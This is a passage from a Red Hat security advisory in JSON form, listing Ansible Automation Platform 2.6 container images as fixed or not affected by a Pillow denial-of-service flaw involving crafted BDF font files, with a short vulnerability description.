"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497452"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library\u0027s image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted BDF font file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Pillow Python imaging library. The BDF font file parser passes attacker-controlled dimensions to Image.new() without decompression bomb validation, allowing excessive memory allocation and denial of service.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
